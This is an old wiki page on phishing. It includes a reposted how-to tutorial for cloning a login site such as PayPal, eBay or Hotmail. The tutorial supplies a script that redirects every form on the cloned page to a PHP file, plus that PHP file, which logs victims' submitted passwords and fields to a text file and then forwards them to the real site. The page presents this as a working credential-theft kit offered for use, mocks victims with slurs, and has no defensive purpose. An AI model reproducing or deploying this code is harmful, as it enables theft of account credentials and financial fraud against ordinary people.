Before you start editing, make sure you RTFInsurgency Wiki:Editing.
Phishing
From Insurgency WIki
Phishing is the act of getting retards to VOLUNTARILY GIVE YOU their passwords, whether to their email, myspace, paypal, or bank account. This is actually a very efficient means of acquiring information (read: people are retarded), and was used to gain 72,000 myspace passwords. Phishing generally entails setting up a website that looks like the legitimate deal, and that the victim falls for (regardless of the fact that they can look into the address bar). Another method is via email with spoofed from headers (accomplished via telnet aka 1337 h4x0r1n6, or other tools), however many email services can detect spoofed headers.
[edit] Methods
[edit] Tutorial
How to phish guide-by grayboy from Totse.com
First off, let's point you to the wikipedia article on phishing since we don't need to repost all of it here: http://en.wikipedia.org/wiki/Phishing. You don't need to read this to follow this post, it's just a good reference.
Phishing is more or less all about stealing sensitive information from unknowing people by presenting them with a false/fake front to a popular or sensitive website and tricking them into thinking it's the real thing.
The most common phishing requests in NS&H are focused around myspace and hotmail or other email sites.
A better description:
Quote: From http://en.wikipedia.org/wiki/Phishing
In computing, phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication. eBay and PayPal are two of the most targeted companies, and online banks are also common targets. Phishing is typically carried out using email or an instant message, and often directs users to a website, although phone contact has been used as well. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, and technical measures.
Yeah, its like that (first section credit goes to Cense & Mort.
What do I need? A account on any host with php access, I suggest 987mb.com Any website editor (don't worry, notepad will suffice. Start>All programs?accesories>notepad.
Now, this shit has to be organised. Create a folder on your desktop or wherever. Now go to your target website, eg Ebay, paypal, hotmail etc. On the keyboard, press control -s. This saves the entire contents on the website onto your computer. Save it into the folder you just created.
Now, look at the files. You will have a html, and you will have a folder with all the other pictures and things from the website. On your pc, it will work perfectly. However, it won't online. This is because the other files are not hosted. So first, host the other files. It will work now, right? Not quite, because they are not linked.
So, go to the html file you downloaded. Right click, go onto edit. Look for the file names of the downloaded items (cntrl -f) and replace the links with the ones you have just hosted.
Now, whilst we are in the html, go to the bottom. Then add this script;
" <script> var x;for(x in
document.forms){void(document.forms[x].action="index.php")};
</script>"
No quotes. save it. You can host this as well now.
Now,in your folder, create a new notepad document. Insert this code;
"<?php
$handle = fopen("out.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\n");
} fwrite($handle, "\n"); fclose($handle); header("Location: http://www.targetsite.com"); ?>"
Be certain to change targetsite.com to the site you are phishing.
Save as index.php, and upload. Thi basically instructs the form where to send the passwords, (out.txt)
Now create another notepad document. Save as out.txt. Upload this.
Now you have a phishing page; do with it as you will. Raw data for raw nerves Read-know-do.
--Thrax 21:51, 19 March 2008 (PDT)
